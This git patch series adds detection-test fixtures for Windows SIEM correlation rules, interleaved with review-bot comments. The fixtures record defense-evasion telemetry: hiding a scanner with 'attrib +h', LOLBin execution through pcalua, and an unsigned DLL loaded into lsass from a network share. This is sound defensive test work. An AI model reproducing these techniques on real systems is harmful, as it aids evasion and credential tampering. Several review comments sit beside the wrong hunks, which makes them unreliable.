В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Masquerading", "correlation_name": "Detect_Fake_ComputerAccount", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "low", "incident.aggregation.key": "Detect_Fake_ComputerAccount|$", "incident.category": "Undefined", "incident.severity": "low", "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "object.account.name": "$", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-18", "subject.account.name": "01566s-win16-ir$", "subject.account.session_id": "999"} From 182798816d10371e25dff1d2e5afdba92a67fcf0 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:07:31 +0300 Subject: [PATCH 20/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Detect=5Fhiding=5Ffiles?= =?UTF-8?q?=5Fvia=5Fattrib=5Fcmdlet)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc 
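Review bot: The only input on the first `+` line is a 4720 whose TargetUserName/SamAccountName is the bare string `$`, so the test never exercises the masquerade the rule is named for — a user account such as `backup$` or `DC01$` created with the normal-account UAC seen here (`NewUacValue` 0x15) rather than through a genuine machine-account creation (4741). Add a second scenario with a name like `svc-sql$` asserting the same correlation, and a negative one with a 4720 for `svc-sql` (no trailing `$`) asserting `expect 0`, so a pattern anchored on the trailing `$` is actually checked. The expected `incident.aggregation.key` is `Detect_Fake_ComputerAccount|$`, i.e. keyed on the account name alone; if that is the rule's real key, identically named accounts created in different domains or on different hosts would collapse into one incident, which may be intended but should be confirmed against the rule.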
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc new file mode 100644
index 00000000..293aaed6
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc
@@ -0,0 +1,5 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-19T17:32:00.4829823Z\"},\"EventRecordID\":\"22013\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1768\",\"ThreadID\":\"2272\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-19 17:32:00.478\"},{\"Name\":\"ProcessGuid\",\"text\":\"{dfae8213-9310-5ce1-0000-0010eaba0a00}\"},{\"Name\":\"ProcessId\",\"text\":\"2728\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\attrib.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.3.9600.16384 (winblue_rtm.130821-1623)\"},{\"Name\":\"Description\",\"text\":\"Attribute Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"attrib +h 
nbtscan.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\ProgramData\\\\\"},{\"Name\":\"User\",\"text\":\"insecurebank\\\\Administrator\"},{\"Name\":\"LogonGuid\",\"text\":\"{dfae8213-9133-5ce1-0000-0020cc660500}\"},{\"Name\":\"LogonId\",\"text\":\"0x566cc\"},{\"Name\":\"TerminalSessionId\",\"text\":\"2\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{dfae8213-91cc-5ce1-0000-0010bef40600}\"},{\"Name\":\"ParentProcessId\",\"text\":\"3408\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "dfae8213-9133-5ce1-0000-0020cc660500", "event_src.category": "Other", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.rule": "technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "insecurebank", "object.account.id": "synthetic:administrator@insecurebank", "object.account.name": "administrator", "object.account.privileges": "High", "object.account.session_id": "353996", "object.process.cmdline": "attrib +h 
nbtscan.exe", "object.process.cwd": "c:\\ProgramData\\", "object.process.fullpath": "c:\\windows\\system32\\attrib.exe", "object.process.guid": "dfae8213-9310-5ce1-0000-0010eaba0a00", "object.process.hash.imphash": "461A33302E82ED68F1A74C083E27BD02", "object.process.hash.md5": "116D463D2F5DBF76F7E2F5C6D8B5D3BB", "object.process.hash.sha1": "B71C1331AC5FA214076E5CD5C885712447057B96", "object.process.hash.sha256": "EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB", "object.process.id": "2728", "object.process.meta": "Description:Attribute Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "attrib.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "dfae8213-91cc-5ce1-0000-0010bef40600", "object.process.parent.id": "3408", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.3.9600.16384 (winblue_rtm.130821-1623)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-16T20:20:55.786Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "synthetic:administrator@insecurebank", "subject.account.name": "administrator", "subject.account.privileges": "High", "subject.account.session_id": "353996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-19T17:32:00.478Z", "type": "raw", "uuid": "df5ffb59-a986-4363-a249-12900323391d"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Defence Evasion", "category.low": "Hide Artifacts: Hidden Files and Directories", "correlation_name": "Detect_hiding_files_via_attrib_cmdlet", "correlation_type": "event", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.rule": "technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Detect_hiding_files_via_attrib_cmdlet|dc1.insecurebank.local|attrib +h nbtscan.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "service", "object.account.domain": "insecurebank", "object.account.id": "synthetic:administrator@insecurebank", "object.account.name": "administrator", "object.account.session_id": "353996", "object.process.cmdline": "attrib +h nbtscan.exe", "object.process.cwd": "c:\\ProgramData\\", "object.process.fullpath": "c:\\windows\\system32\\attrib.exe", "object.process.guid": "dfae8213-9310-5ce1-0000-0010eaba0a00", "object.process.hash.md5": "116D463D2F5DBF76F7E2F5C6D8B5D3BB", "object.process.hash.sha1": "B71C1331AC5FA214076E5CD5C885712447057B96", "object.process.hash.sha256": "EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB", "object.process.id": "2728", "object.process.meta": "Description:Attribute Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "attrib.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "dfae8213-91cc-5ce1-0000-0010bef40600", 
"object.process.parent.id": "3408", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.3.9600.16384 (winblue_rtm.130821-1623)", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "synthetic:administrator@insecurebank", "subject.account.name": "administrator", "subject.account.privileges": "High", "subject.account.session_id": "353996"} + \ No newline at end of file From bd446318fb0a0ba0d55b65fc15fcfd6224bff3d2 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:18:01 +0300 Subject: [PATCH 21/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Detect=5Flolbin=5Fpcalua=5Fexec)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_lolbin_pcalua_exec/tests/test_1.sc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_lolbin_pcalua_exec/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_lolbin_pcalua_exec/tests/test_1.sc index a8fc81db..eff45bf3 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_lolbin_pcalua_exec/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_lolbin_pcalua_exec/tests/test_1.sc 
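Review bot: The `+expect 1` line pins `"object": "service"` for a correlation raised from a Sysmon process-creation event whose own `object` is `process`, while the pcalua expectation in this same series keeps `"object": "process"`; unless the rule deliberately relabels it, this looks like a field copied from a service-based rule, and the test would now enshrine it — confirm against the rule before merging. The same line emits `"category.high": "Defence Evasion"` whereas every other rule here uses `Defense Evasion`; a spelling drift in the taxonomy silently splits dashboards and filters, so align it to `Defense Evasion` in both rule and test. Coverage is also thin: the single command line `attrib +h nbtscan.exe` does not show whether `attrib +s +h`, `+H`, or the recursive `/s /d` forms match, nor that `attrib -h` or `attrib +r` stay silent — add one positive variant and an `expect 0` negative. The hunk also ends with a whitespace-only line before `\ No newline at end of file`, which should be dropped.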
@@ -2,4 +2,4 @@ {"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-12T17:01:51.0079509Z\"},\"EventRecordID\":\"16498\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2012\",\"ThreadID\":\"300\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-12 17:01:50.852\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-517e-5cd8-0000-00105fe01700}\"},{\"Name\":\"ProcessId\",\"text\":\"2920\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\calc.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7600.16385 (win7_rtm.090713-1255)\"},{\"Name\":\"Description\",\"text\":\"Windows Calculator\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\calc.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-4fb5-5cd8-0000-0020f2350100}\"},{\"Name\":\"LogonId\",\"text\":\"0x135f2\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-517e-5cd8-0000-001024d61700}\"},{\"Name\":\"ParentProcessId\",\"text\":\"2952\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\pcalua.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\pcalua.exe\\\" -a c:\\\\Windows\\\\system32\\\\calc.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-4fb5-5cd8-0000-0020f2350100", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "79346", "object.process.cmdline": "\"C:\\Windows\\system32\\calc.exe\"", 
"object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\calc.exe", "object.process.guid": "365abb72-517e-5cd8-0000-00105fe01700", "object.process.hash.imphash": "F93B5D76132F6E6068946EC238813CE1", "object.process.hash.md5": "60B7C0FEAD45F2066E5B805A91F4F0FC", "object.process.hash.sha1": "9018A7D6CDBE859A430E8794E73381F77C840BE0", "object.process.hash.sha256": "80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22", "object.process.id": "2920", "object.process.meta": "Description:Windows Calculator | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "calc.exe", "object.process.parent.cmdline": "\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\pcalua.exe", "object.process.parent.guid": "365abb72-517e-5cd8-0000-001024d61700", "object.process.parent.id": "2952", "object.process.parent.name": "pcalua.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-18T11:57:05.702Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "79346", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-12T17:01:50.852Z", "type": "raw", "uuid": "a3e0c4e1-5d29-49ce-a9b5-01ff83ea0341"} # Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Detect_lolbin_pcalua_exec"} +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indirect Command Execution", "correlation_name": "Detect_lolbin_pcalua_exec", "correlation_type": "incident", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Detect_lolbin_pcalua_exec|iewin7|\"c:\\windows\\system32\\pcalua.exe\" -a c:\\windows\\system32\\calc.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.session_id": "79346", "object.process.cmdline": "\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\pcalua.exe", "object.process.guid": "365abb72-517e-5cd8-0000-001024d61700", "object.process.hash.md5": "D652BA887500816431566B524292ECCB", "object.process.hash.sha1": "ABB6319976D9702E0C80978D51C0AEE88A33D201", "object.process.hash.sha256": "65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE", "object.process.id": "2952", "object.process.meta": "Description:Program Compatibility Assistant | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "pcalua.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "365abb72-516b-5cd8-0000-001087e41600", "object.process.parent.id": "3788", 
"object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "79346"} \ No newline at end of file From c25f5388bc3fa310269ba4a249c7db95460a4b4b Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:23:56 +0300 Subject: [PATCH 22/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(ImageLoad=5Ffrom=5FNetw?= =?UTF-8?q?ork=5FShare=5Fto=5FLSASS)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc new file mode 100644 index 00000000..73a7c96c --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc 
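Review bot: The expected event on the `+expect 1` line is built from the pcalua.exe start itself (hashes `D652BA…`, parent cmd.exe, PID 2952), which is the file's first line and sits outside this hunk, while the visible calc.exe event (parent pcalua.exe, `-a c:\Windows\system32\calc.exe`) is only context; with `expect 1` it is not clear whether the rule is meant to fire on the pcalua launch alone or on the parent/child pair, so a one-line comment above the expectation naming the triggering event would help the next maintainer. Only the `-a <exe>` form is covered; pcalua.exe is also abused with an argument-carrying target (`-a <exe> -c <args>`) or a UNC path, and there is no scenario asserting `expect 0` for a pcalua.exe start without `-a` (presumably the Program Compatibility Assistant's own invocations), so neither the matching pattern nor the false-positive side is tested. The expanded expectation now pins every hash, GUID and the lowercased cmdline inside `incident.aggregation.key`, which is a fine regression pin but means a normalizer change will fail this test rather than the rule — worth a note in the test header.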
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-10-06T21:40:30.9100858Z\"},\"EventRecordID\":\"345820\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"6964\",\"ThreadID\":\"4396\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"02694w-win10.threebeesco.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-10-06 21:40:30.884\"},{\"Name\":\"ProcessGuid\",\"text\":\"{6a3c3ef2-50ee-5f7c-0000-0010237c0000}\"},{\"Name\":\"ProcessId\",\"text\":\"636\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"\\\\\\\\172.16.66.254\\\\shared\\\\lsadb.dll\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A205D58173502270A59A6093FA6E9CE382A943AB,MD5=6666492B0246D6AC8B13DA6870314CFC,SHA256=266E4E2970FFB24EE63108F25AAC6EE8359F86728D045097D6E6309CE249BD70,IMPHASH=8DEF796746DD54062D5B3186EEF39356\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "02694w-win10.threebeesco.com", "event_src.host": "02694w-win10.threebeesco.com", "event_src.hostname": "02694w-win10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", 
"generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "\\\\172.16.66.254\\shared\\lsadb.dll", "object.process.hash.imphash": "8DEF796746DD54062D5B3186EEF39356", "object.process.hash.md5": "6666492B0246D6AC8B13DA6870314CFC", "object.process.hash.sha1": "A205D58173502270A59A6093FA6E9CE382A943AB", "object.process.hash.sha256": "266E4E2970FFB24EE63108F25AAC6EE8359F86728D045097D6E6309CE249BD70", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "lsadb.dll", "object.process.path": "\\\\172.16.66.254\\shared\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T18:54:28.671Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "6a3c3ef2-50ee-5f7c-0000-0010237c0000", "subject.process.id": "636", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-10-06T21:40:30.884Z", "type": "raw", "uuid": "fee95cf5-17d0-47f9-ac5c-433d03423410"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.context": "\\\\172.16.66.254\\shared\\lsadb.dll", "alert.key": "lsass.exe|\\\\172.16.66.254\\shared\\lsadb.dll", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Authentication Process: Password Filter DLL", "correlation_name": "ImageLoad_from_Network_Share_to_LSASS", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "02694w-win10.threebeesco.com", "event_src.host": "02694w-win10.threebeesco.com", "event_src.hostname": "02694w-win10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "ImageLoad_from_Network_Share_to_LSASS|02694w-win10.threebeesco.com|\\\\172.16.66.254\\shared\\lsadb.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "\\\\172.16.66.254\\shared\\lsadb.dll", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "lsadb.dll", "object.process.path": "\\\\172.16.66.254\\shared\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "6a3c3ef2-50ee-5f7c-0000-0010237c0000", "subject.process.id": "636", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\"} From ee693bc58f2ad42f86c5ceabda99820c39905c96 Mon Sep 17 00:00:00 2001 
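Review bot: The only comment in this fixture is still the scaffold placeholder (`# Тут будет твой тест. В секции expect укажи ...`) rather than a description of the case, and the same placeholder is committed unchanged in all four Portproxy_netsh tests that follow. A one-line comment naming what each fixture exercises makes the expect line reviewable without decoding the embedded event XML, e.g. here `# Sysmon EID 7: unsigned DLL loaded into lsass.exe from a UNC share; one incident expected`, and for Portproxy test_2 the fact that it covers the abbreviated `netsh I p a v ...` argument form is worth stating explicitly since that is the non-obvious part of that case. This file is also a positive-only fixture; a companion test with a signed module loaded from a local path is the usual way to pin that the rule stays quiet on routine lsass.exe image loads, assuming the rule keys on the UNC path or the signature status as the expected `alert.context` suggests.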
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Mon, 31 Jul 2023 11:47:19 +0300
